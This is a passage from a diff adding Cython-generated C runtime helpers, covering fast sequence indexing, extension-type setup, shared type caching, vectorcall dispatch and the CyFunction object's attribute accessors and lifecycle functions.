CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + Py_ssize_t wrapped_i = i; + if (wraparound & unlikely(i < 0)) { + wrapped_i += PyTuple_GET_SIZE(o); + } + if ((!boundscheck) || likely(__Pyx_is_valid_index(wrapped_i, PyTuple_GET_SIZE(o)))) { + PyObject *r = PyTuple_GET_ITEM(o, wrapped_i); + Py_INCREF(r); + return r; + } + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +#else + return PySequence_GetItem(o, i); +#endif +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Fast(PyObject *o, Py_ssize_t i, int is_list, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS && CYTHON_USE_TYPE_SLOTS + if (is_list || PyList_CheckExact(o)) { + Py_ssize_t n = ((!wraparound) | likely(i >= 0)) ? i : i + PyList_GET_SIZE(o); + if ((!boundscheck) || (likely(__Pyx_is_valid_index(n, PyList_GET_SIZE(o))))) { + PyObject *r = PyList_GET_ITEM(o, n); + Py_INCREF(r); + return r; + } + } + else if (PyTuple_CheckExact(o)) { + Py_ssize_t n = ((!wraparound) | likely(i >= 0)) ? i : i + PyTuple_GET_SIZE(o); + if ((!boundscheck) || likely(__Pyx_is_valid_index(n, PyTuple_GET_SIZE(o)))) { + PyObject *r = PyTuple_GET_ITEM(o, n); + Py_INCREF(r); + return r; + } + } else { + PyMappingMethods *mm = Py_TYPE(o)->tp_as_mapping; + PySequenceMethods *sm = Py_TYPE(o)->tp_as_sequence; + if (mm && mm->mp_subscript) { + PyObject *r, *key = PyInt_FromSsize_t(i); + if (unlikely(!key)) return NULL; + r = mm->mp_subscript(o, key); + Py_DECREF(key); + return r; + } + if (likely(sm && sm->sq_item)) { + if (wraparound && unlikely(i < 0) && likely(sm->sq_length)) { + Py_ssize_t l = sm->sq_length(o); + if (likely(l >= 0)) { + i += l; + } else { + if (!PyErr_ExceptionMatches(PyExc_OverflowError)) + return NULL; + PyErr_Clear(); + } + } + return sm->sq_item(o, i); + } + } +#else + if (is_list || PySequence_Check(o)) { + return PySequence_GetItem(o, i); + } +#endif + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +} + +/* FixUpExtensionType */ +#if CYTHON_USE_TYPE_SPECS +static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type) { +#if PY_VERSION_HEX > 0x030900B1 || CYTHON_COMPILING_IN_LIMITED_API + CYTHON_UNUSED_VAR(spec); + CYTHON_UNUSED_VAR(type); +#else + const PyType_Slot *slot = spec->slots; + while (slot && slot->slot && slot->slot != Py_tp_members) + slot++; + if (slot && slot->slot == Py_tp_members) { + int changed = 0; +#if !(PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON) + const +#endif + PyMemberDef *memb = (PyMemberDef*) slot->pfunc; + while (memb && memb->name) { + if (memb->name[0] == '_' && memb->name[1] == '_') { +#if PY_VERSION_HEX < 0x030900b1 + if (strcmp(memb->name, "__weaklistoffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); + type->tp_weaklistoffset = memb->offset; + changed = 1; + } + else if (strcmp(memb->name, "__dictoffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); + type->tp_dictoffset = memb->offset; + changed = 1; + } +#if CYTHON_METH_FASTCALL + else if (strcmp(memb->name, "__vectorcalloffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); +#if PY_VERSION_HEX >= 0x030800b4 + type->tp_vectorcall_offset = memb->offset; +#else + type->tp_print = (printfunc) memb->offset; +#endif + changed = 1; + } +#endif +#else + if ((0)); +#endif +#if PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON + else if (strcmp(memb->name, "__module__") == 0) { + PyObject *descr; + assert(memb->type == T_OBJECT); + assert(memb->flags == 0 || memb->flags == READONLY); + descr = PyDescr_NewMember(type, memb); + if (unlikely(!descr)) + return -1; + if (unlikely(PyDict_SetItem(type->tp_dict, PyDescr_NAME(descr), descr) < 0)) { + Py_DECREF(descr); + return -1; + } + Py_DECREF(descr); + changed = 1; + } +#endif + } + memb++; + } + if (changed) + PyType_Modified(type); + } +#endif + return 0; +} +#endif + +/* FetchSharedCythonModule */ +static PyObject *__Pyx_FetchSharedCythonABIModule(void) { + PyObject *abi_module = PyImport_AddModule((char*) __PYX_ABI_MODULE_NAME); + if (unlikely(!abi_module)) return NULL; + Py_INCREF(abi_module); + return abi_module; +} + +/* FetchCommonType */ +static int __Pyx_VerifyCachedType(PyObject *cached_type, + const char *name, + Py_ssize_t basicsize, + Py_ssize_t expected_basicsize) { + if (!PyType_Check(cached_type)) { + PyErr_Format(PyExc_TypeError, + "Shared Cython type %.200s is not a type object", name); + return -1; + } + if (basicsize != expected_basicsize) { + PyErr_Format(PyExc_TypeError, + "Shared Cython type %.200s has the wrong size, try recompiling", + name); + return -1; + } + return 0; +} +#if !CYTHON_USE_TYPE_SPECS +static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type) { + PyObject* abi_module; + const char* object_name; + PyTypeObject *cached_type = NULL; + abi_module = __Pyx_FetchSharedCythonABIModule(); + if (!abi_module) return NULL; + object_name = strrchr(type->tp_name, '.'); + object_name = object_name ? object_name+1 : type->tp_name; + cached_type = (PyTypeObject*) PyObject_GetAttrString(abi_module, object_name); + if (cached_type) { + if (__Pyx_VerifyCachedType( + (PyObject *)cached_type, + object_name, + cached_type->tp_basicsize, + type->tp_basicsize) < 0) { + goto bad; + } + goto done; + } + if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; + PyErr_Clear(); + if (PyType_Ready(type) < 0) goto bad; + if (PyObject_SetAttrString(abi_module, object_name, (PyObject *)type) < 0) + goto bad; + Py_INCREF(type); + cached_type = type; +done: + Py_DECREF(abi_module); + return cached_type; +bad: + Py_XDECREF(cached_type); + cached_type = NULL; + goto done; +} +#else +static PyTypeObject *__Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases) { + PyObject *abi_module, *cached_type = NULL; + const char* object_name = strrchr(spec->name, '.'); + object_name = object_name ? object_name+1 : spec->name; + abi_module = __Pyx_FetchSharedCythonABIModule(); + if (!abi_module) return NULL; + cached_type = PyObject_GetAttrString(abi_module, object_name); + if (cached_type) { + Py_ssize_t basicsize; +#if CYTHON_COMPILING_IN_LIMITED_API + PyObject *py_basicsize; + py_basicsize = PyObject_GetAttrString(cached_type, "__basicsize__"); + if (unlikely(!py_basicsize)) goto bad; + basicsize = PyLong_AsSsize_t(py_basicsize); + Py_DECREF(py_basicsize); + py_basicsize = 0; + if (unlikely(basicsize == (Py_ssize_t)-1) && PyErr_Occurred()) goto bad; +#else + basicsize = likely(PyType_Check(cached_type)) ? ((PyTypeObject*) cached_type)->tp_basicsize : -1; +#endif + if (__Pyx_VerifyCachedType( + cached_type, + object_name, + basicsize, + spec->basicsize) < 0) { + goto bad; + } + goto done; + } + if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; + PyErr_Clear(); + CYTHON_UNUSED_VAR(module); + cached_type = __Pyx_PyType_FromModuleAndSpec(abi_module, spec, bases); + if (unlikely(!cached_type)) goto bad; + if (unlikely(__Pyx_fix_up_extension_type_from_spec(spec, (PyTypeObject *) cached_type) < 0)) goto bad; + if (PyObject_SetAttrString(abi_module, object_name, cached_type) < 0) goto bad; +done: + Py_DECREF(abi_module); + assert(cached_type == NULL || PyType_Check(cached_type)); + return (PyTypeObject *) cached_type; +bad: + Py_XDECREF(cached_type); + cached_type = NULL; + goto done; +} +#endif + +/* PyObjectGetAttrStr */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name) { + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_getattro)) + return tp->tp_getattro(obj, attr_name); +#if PY_MAJOR_VERSION < 3 + if (likely(tp->tp_getattr)) + return tp->tp_getattr(obj, PyString_AS_STRING(attr_name)); +#endif + return PyObject_GetAttr(obj, attr_name); +} +#endif + +/* PyVectorcallFastCallDict */ +#if CYTHON_METH_FASTCALL +static PyObject *__Pyx_PyVectorcall_FastCallDict_kw(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) +{ + PyObject *res = NULL; + PyObject *kwnames; + PyObject **newargs; + PyObject **kwvalues; + Py_ssize_t i, pos; + size_t j; + PyObject *key, *value; + unsigned long keys_are_strings; + Py_ssize_t nkw = PyDict_GET_SIZE(kw); + newargs = (PyObject **)PyMem_Malloc((nargs + (size_t)nkw) * sizeof(args[0])); + if (unlikely(newargs == NULL)) { + PyErr_NoMemory(); + return NULL; + } + for (j = 0; j < nargs; j++) newargs[j] = args[j]; + kwnames = PyTuple_New(nkw); + if (unlikely(kwnames == NULL)) { + PyMem_Free(newargs); + return NULL; + } + kwvalues = newargs + nargs; + pos = i = 0; + keys_are_strings = Py_TPFLAGS_UNICODE_SUBCLASS; + while (PyDict_Next(kw, &pos, &key, &value)) { + keys_are_strings &= Py_TYPE(key)->tp_flags; + Py_INCREF(key); + Py_INCREF(value); + PyTuple_SET_ITEM(kwnames, i, key); + kwvalues[i] = value; + i++; + } + if (unlikely(!keys_are_strings)) { + PyErr_SetString(PyExc_TypeError, "keywords must be strings"); + goto cleanup; + } + res = vc(func, newargs, nargs, kwnames); +cleanup: + Py_DECREF(kwnames); + for (i = 0; i < nkw; i++) + Py_DECREF(kwvalues[i]); + PyMem_Free(newargs); + return res; +} +static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) +{ + if (likely(kw == NULL) || PyDict_GET_SIZE(kw) == 0) { + return vc(func, args, nargs, NULL); + } + return __Pyx_PyVectorcall_FastCallDict_kw(func, vc, args, nargs, kw); +} +#endif + +/* CythonFunctionShared */ +static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj) { +#if PY_VERSION_HEX < 0x030900B1 + __Pyx_Py_XDECREF_SET( + __Pyx_CyFunction_GetClassObj(f), + ((classobj) ? __Pyx_NewRef(classobj) : NULL)); +#else + __Pyx_Py_XDECREF_SET( + ((PyCMethodObject *) (f))->mm_class, + (PyTypeObject*)((classobj) ? __Pyx_NewRef(classobj) : NULL)); +#endif +} +static PyObject * +__Pyx_CyFunction_get_doc(__pyx_CyFunctionObject *op, void *closure) +{ + CYTHON_UNUSED_VAR(closure); + if (unlikely(op->func_doc == NULL)) { + if (((PyCFunctionObject*)op)->m_ml->ml_doc) { +#if PY_MAJOR_VERSION >= 3 + op->func_doc = PyUnicode_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); +#else + op->func_doc = PyString_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); +#endif + if (unlikely(op->func_doc == NULL)) + return NULL; + } else { + Py_INCREF(Py_None); + return Py_None; + } + } + Py_INCREF(op->func_doc); + return op->func_doc; +} +static int +__Pyx_CyFunction_set_doc(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (value == NULL) { + value = Py_None; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_doc, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_name(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(op->func_name == NULL)) { +#if PY_MAJOR_VERSION >= 3 + op->func_name = PyUnicode_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); +#else + op->func_name = PyString_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); +#endif + if (unlikely(op->func_name == NULL)) + return NULL; + } + Py_INCREF(op->func_name); + return op->func_name; +} +static int +__Pyx_CyFunction_set_name(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__name__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_name, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_qualname(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + Py_INCREF(op->func_qualname); + return op->func_qualname; +} +static int +__Pyx_CyFunction_set_qualname(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__qualname__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_qualname, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_dict(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(op->func_dict == NULL)) { + op->func_dict = PyDict_New(); + if (unlikely(op->func_dict == NULL)) + return NULL; + } + Py_INCREF(op->func_dict); + return op->func_dict; +} +static int +__Pyx_CyFunction_set_dict(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(value == NULL)) { + PyErr_SetString(PyExc_TypeError, + "function's dictionary may not be deleted"); + return -1; + } + if (unlikely(!PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "setting function's dictionary to a non-dict"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_dict, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_globals(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + Py_INCREF(op->func_globals); + return op->func_globals; +} +static PyObject * +__Pyx_CyFunction_get_closure(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(op); + CYTHON_UNUSED_VAR(context); + Py_INCREF(Py_None); + return Py_None; +} +static PyObject * +__Pyx_CyFunction_get_code(__pyx_CyFunctionObject *op, void *context) +{ + PyObject* result = (op->func_code) ? op->func_code : Py_None; + CYTHON_UNUSED_VAR(context); + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_init_defaults(__pyx_CyFunctionObject *op) { + int result = 0; + PyObject *res = op->defaults_getter((PyObject *) op); + if (unlikely(!res)) + return -1; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + op->defaults_tuple = PyTuple_GET_ITEM(res, 0); + Py_INCREF(op->defaults_tuple); + op->defaults_kwdict = PyTuple_GET_ITEM(res, 1); + Py_INCREF(op->defaults_kwdict); + #else + op->defaults_tuple = PySequence_ITEM(res, 0); + if (unlikely(!op->defaults_tuple)) result = -1; + else { + op->defaults_kwdict = PySequence_ITEM(res, 1); + if (unlikely(!op->defaults_kwdict)) result = -1; + } + #endif + Py_DECREF(res); + return result; +} +static int +__Pyx_CyFunction_set_defaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value) { + value = Py_None; + } else if (unlikely(value != Py_None && !PyTuple_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__defaults__ must be set to a tuple object"); + return -1; + } + PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__defaults__ will not " + "currently affect the values used in function calls", 1); + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->defaults_tuple, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_defaults(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->defaults_tuple; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + if (op->defaults_getter) { + if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; + result = op->defaults_tuple; + } else { + result = Py_None; + } + } + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_set_kwdefaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value) { + value = Py_None; + } else if (unlikely(value != Py_None && !PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__kwdefaults__ must be set to a dict object"); + return -1; + } + PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__kwdefaults__ will not " + "currently affect the values used in function calls", 1); + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->defaults_kwdict, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_kwdefaults(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->defaults_kwdict; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + if (op->defaults_getter) { + if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; + result = op->defaults_kwdict; + } else { + result = Py_None; + } + } + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_set_annotations(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value || value == Py_None) { + value = NULL; + } else if (unlikely(!PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__annotations__ must be set to a dict object"); + return -1; + } + Py_XINCREF(value); + __Pyx_Py_XDECREF_SET(op->func_annotations, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_annotations(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->func_annotations; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + result = PyDict_New(); + if (unlikely(!result)) return NULL; + op->func_annotations = result; + } + Py_INCREF(result); + return result; +} +static PyObject * +__Pyx_CyFunction_get_is_coroutine(__pyx_CyFunctionObject *op, void *context) { + int is_coroutine; + CYTHON_UNUSED_VAR(context); + if (op->func_is_coroutine) { + return __Pyx_NewRef(op->func_is_coroutine); + } + is_coroutine = op->flags & __Pyx_CYFUNCTION_COROUTINE; +#if PY_VERSION_HEX >= 0x03050000 + if (is_coroutine) { + PyObject *module, *fromlist, *marker = __pyx_n_s_is_coroutine; + fromlist = PyList_New(1); + if (unlikely(!fromlist)) return NULL; + Py_INCREF(marker); + PyList_SET_ITEM(fromlist, 0, marker); + module = PyImport_ImportModuleLevelObject(__pyx_n_s_asyncio_coroutines, NULL, NULL, fromlist, 0); + Py_DECREF(fromlist); + if (unlikely(!module)) goto ignore; + op->func_is_coroutine = __Pyx_PyObject_GetAttrStr(module, marker); + Py_DECREF(module); + if (likely(op->func_is_coroutine)) { + return __Pyx_NewRef(op->func_is_coroutine); + } +ignore: + PyErr_Clear(); + } +#endif + op->func_is_coroutine = __Pyx_PyBool_FromLong(is_coroutine); + return __Pyx_NewRef(op->func_is_coroutine); +} +static PyGetSetDef __pyx_CyFunction_getsets[] = { + {(char *) "func_doc", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, + {(char *) "__doc__", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, + {(char *) "func_name", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, + {(char *) "__name__", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, + {(char *) "__qualname__", (getter)__Pyx_CyFunction_get_qualname, (setter)__Pyx_CyFunction_set_qualname, 0, 0}, + {(char *) "func_dict", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, + {(char *) "__dict__", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, + {(char *) "func_globals", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, + {(char *) "__globals__", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, + {(char *) "func_closure", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, + {(char *) "__closure__", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, + {(char *) "func_code", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, + {(char *) "__code__", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, + {(char *) "func_defaults", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, + {(char *) "__defaults__", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, + {(char *) "__kwdefaults__", (getter)__Pyx_CyFunction_get_kwdefaults, (setter)__Pyx_CyFunction_set_kwdefaults, 0, 0}, + {(char *) "__annotations__", (getter)__Pyx_CyFunction_get_annotations, (setter)__Pyx_CyFunction_set_annotations, 0, 0}, + {(char *) "_is_coroutine", (getter)__Pyx_CyFunction_get_is_coroutine, 0, 0, 0}, + {0, 0, 0, 0, 0} +}; +static PyMemberDef __pyx_CyFunction_members[] = { + {(char *) "__module__", T_OBJECT, offsetof(PyCFunctionObject, m_module), 0, 0}, +#if CYTHON_USE_TYPE_SPECS + {(char *) "__dictoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_dict), READONLY, 0}, +#if CYTHON_METH_FASTCALL +#if CYTHON_BACKPORT_VECTORCALL + {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_vectorcall), READONLY, 0}, +#else + {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(PyCFunctionObject, vectorcall), READONLY, 0}, +#endif +#endif +#if PY_VERSION_HEX < 0x030500A0 + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_weakreflist), READONLY, 0}, +#else + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(PyCFunctionObject, m_weakreflist), READONLY, 0}, +#endif +#endif + {0, 0, 0, 0, 0} +}; +static PyObject * +__Pyx_CyFunction_reduce(__pyx_CyFunctionObject *m, PyObject *args) +{ + CYTHON_UNUSED_VAR(args); +#if PY_MAJOR_VERSION >= 3 + Py_INCREF(m->func_qualname); + return m->func_qualname; +#else + return PyString_FromString(((PyCFunctionObject*)m)->m_ml->ml_name); +#endif +} +static PyMethodDef __pyx_CyFunction_methods[] = { + {"__reduce__", (PyCFunction)__Pyx_CyFunction_reduce, METH_VARARGS, 0}, + {0, 0, 0, 0} +}; +#if PY_VERSION_HEX < 0x030500A0 +#define __Pyx_CyFunction_weakreflist(cyfunc) ((cyfunc)->func_weakreflist) +#else +#define __Pyx_CyFunction_weakreflist(cyfunc) (((PyCFunctionObject*)cyfunc)->m_weakreflist) +#endif +static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject *op, PyMethodDef *ml, int flags, PyObject* qualname, + PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { + PyCFunctionObject *cf = (PyCFunctionObject*) op; + if (unlikely(op == NULL)) + return NULL; + op->flags = flags; + __Pyx_CyFunction_weakreflist(op) = NULL; + cf->m_ml = ml; + cf->m_self = (PyObject *) op; + Py_XINCREF(closure); + op->func_closure = closure; + Py_XINCREF(module); + cf->m_module = module; + op->func_dict = NULL; + op->func_name = NULL; + Py_INCREF(qualname); + op->func_qualname = qualname; + op->func_doc = NULL; +#if PY_VERSION_HEX < 0x030900B1 + op->func_classobj = NULL; +#else + ((PyCMethodObject*)op)->mm_class = NULL; +#endif + op->func_globals = globals; + Py_INCREF(op->func_globals); + Py_XINCREF(code); + op->func_code = code; + op->defaults_pyobjects = 0; + op->defaults_size = 0; + op->defaults = NULL; + op->defaults_tuple = NULL; + op->defaults_kwdict = NULL; + op->defaults_getter = NULL; + op->func_annotations = NULL; + op->func_is_coroutine = NULL; +#if CYTHON_METH_FASTCALL + switch (ml->ml_flags & (METH_VARARGS | METH_FASTCALL | METH_NOARGS | METH_O | METH_KEYWORDS | METH_METHOD)) { + case METH_NOARGS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_NOARGS; + break; + case METH_O: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_O; + break; + case METH_METHOD | METH_FASTCALL | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD; + break; + case METH_FASTCALL | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS; + break; + case METH_VARARGS | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = NULL; + break; + default: + PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); + Py_DECREF(op); + return NULL; + } +#endif + return (PyObject *) op; +} +static int +__Pyx_CyFunction_clear(__pyx_CyFunctionObject *m) +{ + Py_CLEAR(m->func_closure); + Py_CLEAR(((PyCFunctionObject*)m)->m_module); + Py_CLEAR(m->func_dict); + Py_CLEAR(m->func_name); + Py_CLEAR(m->func_qualname); + Py_CLEAR(m->func_doc); + Py_CLEAR(m->func_globals); + Py_CLEAR(m->func_code); +#if PY_VERSION_HEX < 0x030900B1 + Py_CLEAR(__Pyx_CyFunction_GetClassObj(m)); +#else + { + PyObject *cls = (PyObject*) ((PyCMethodObject *) (m))->mm_class; + ((PyCMethodObject *) (m))->mm_class = NULL; + Py_XDECREF(cls); + } +#endif + Py_CLEAR(m->defaults_tuple); + Py_CLEAR(m->defaults_kwdict); + Py_CLEAR(m->func_annotations); + Py_CLEAR(m->func_is_coroutine); + if (m->defaults) { + PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); + int i; + for (i = 0; i < m->defaults_pyobjects; i++) + Py_XDECREF(pydefaults[i]); + PyObject_Free(m->defaults); + m->defaults = NULL; + } + return 0; +} +static void __Pyx__CyFunction_dealloc(__pyx_CyFunctionObject *m) +{ + if (__Pyx_CyFunction_weakreflist(m) != NULL) + PyObject_ClearWeakRefs((PyObject *) m); + __Pyx_CyFunction_clear(m); + __Pyx_PyHeapTypeObject_GC_Del(m); +} +static void __Pyx_CyFunction_dealloc(__pyx_CyFunctionObject *m) +{ + PyObject_GC_UnTrack(m); + __Pyx__CyFunction_dealloc(m); +} +static int __Pyx_CyFunction_traverse(__pyx_CyFunctionObject *m, visitproc visit, void *arg) +{ + Py_VISIT(m->func_closure); + Py_VISIT(((PyCFunctionObject*)m)->m_module); + Py_VISIT(m->func_dict); + Py_VISIT(m->func_name); + Py_VISIT(m->func_qualname); + Py_VISIT(m->func_doc); + Py_VISIT(m->func_globals); + Py_VISIT(m->func_code); + Py_VISIT(__Pyx_CyFunction_GetClassObj(m)); + Py_VISIT(m->defaults_tuple); + Py_VISIT(m->defaults_kwdict); + Py_VISIT(m->func_is_coroutine); + if (m->defaults) { + PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); + int i; + for (i = 0; i < m->defaults_pyobjects; i++) + Py_VISIT(pydefaults[i]); + } + return 0; +} +static PyObject* +__Pyx_CyFunction_repr(__pyx_CyFunctionObject *op) +{ +#if PY_MAJOR_VERSION >= 3 + return PyUnicode_FromFormat("", + op->func_qualname, (void *)op); +#else + return PyString_FromFormat("", + PyString_AsString(op->func_qualname), (void *)op); +#endif +} +static PyObject * __Pyx_CyFunction_CallMethod(PyObject *func, PyObject *self, PyObject *arg, PyObject *kw) { + PyCFunctionObject* f = (PyCFunctionObject*)func; + PyCFunction meth = f->m_ml->ml_meth; + Py_ssize_t size; + switch (f->m_ml->ml_flags & (METH_VARARGS | METH_KEYWORDS | METH_NOARGS | METH_O)) { + case METH_VARARGS: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) + return (*meth)(self, arg); + break; + case METH_VARARGS | METH_KEYWORDS: + return (*(PyCFunctionWithKeywords)(void*)meth)(self, arg, kw); + case METH_NOARGS: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) { + size = PyTuple_GET_SIZE(arg); + if (likely(size == 0)) + return (*meth)(self, NULL); + PyErr_Format(PyExc_TypeError, + "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", + f->m_ml->ml_name, size); + return NULL; + } + break; + case METH_O: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) { + size = PyTuple_GET_SIZE(arg); + if (likely(size == 1)) { + PyObject *result, *arg0; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + arg0 = PyTuple_GET_ITEM(arg, 0); + #else + arg0 = PySequence_ITEM(arg, 0); if (unlikely(!arg0)) return NULL; + #endif + result = (*meth)(self, arg0); + #if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) + Py_DECREF(arg0); + #endif + return result; + } + PyErr_Format(PyExc_TypeError, + "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", + f->m_ml->ml_name, size); + return NULL; + } + break; + default: + PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); + return NULL; + } + PyErr_Format(PyExc_TypeError, "%.200s() takes no keyword arguments", + f->m_ml->ml_name); + return NULL; +} +static CYTHON_INLINE PyObject *__Pyx_CyFunction_Call(PyObject *func, PyObject *arg, PyObject *kw) { + return __Pyx_CyFunction_CallMethod(func, ((PyCFunctionObject*)func)->m_self, arg, kw); +} +static PyObject *__Pyx_CyFunction_CallAsMethod(PyObject *func, PyObject *args, PyObject *kw) { + PyObject *result; + __pyx_CyFunctionObject 